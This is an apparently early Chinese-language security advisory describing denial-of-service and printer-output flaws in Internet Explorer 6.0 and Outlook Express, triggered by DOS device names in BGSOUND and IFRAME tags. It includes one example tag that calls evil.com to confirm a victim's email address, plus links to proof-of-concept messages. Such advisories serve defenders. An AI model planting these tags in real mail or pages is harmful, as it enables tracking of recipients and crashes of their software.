涉及程序：

Internet Explorer 6.0

描述：

Outlook Express引起对硬件操作与拒绝服务攻击

详细：

　　在所有的Windows版本里都会给一些特殊的设备预留特殊的文件名，比如：

prn、aux、nul等等，这些都被称为DOS设备。特殊设备后面可以跟着任何的目

录名或后缀，比如：c:\temp\prn.tmp就是指向prn设备。指向特殊设备和一般 文件所用的API是一样的。没有经过授权的对设备进行操作会带来重大的安全隐

患，比如：拒绝服务攻击会引起正在运行的程序出错或硬件出错，以及危及到

数据的安全。

　　现在发现如果在使用^BGSOUND^的HTML标签时加上特殊的设备名，不论安全

级别设置如何，这都将会使Outlook Express或IE受到拒绝服务攻击。对于 Outlook Express来说，带有攻击信件的文件夹就只有将它删除，没有别的方法 可以恢复。另外，我们还发现使用^IFRAME^标签可以向特殊设备发出任何的数据。

　　还有一个问题，不论安全级别如何设置，^BGSOUND^还是会无条件下载它里

面所指定的文件。这样攻击者就有可能利用受害者的email进行采指纹。比如：

^bgsound src="http://evil.com/registerme?email=victim@com.com"^

附上攻击示范： 1. 利用Outlook Express进行拒绝服务攻击

http://www.security.nnov.ru/files/iedos/dos.eml

2. 利用漏洞向打印机直接输出文字

http://www.security.nnov.ru/files/iedos/print.eml

解决方案：

对此，目前还没有找到有效的解决方案，但是我们还是建议用户要时刻注意这

个问题，关注Microsoft的对IE的升级补丁或留意本站每日的更新，并采取适当

的过滤以阻止外部的攻击。

主目录 分目录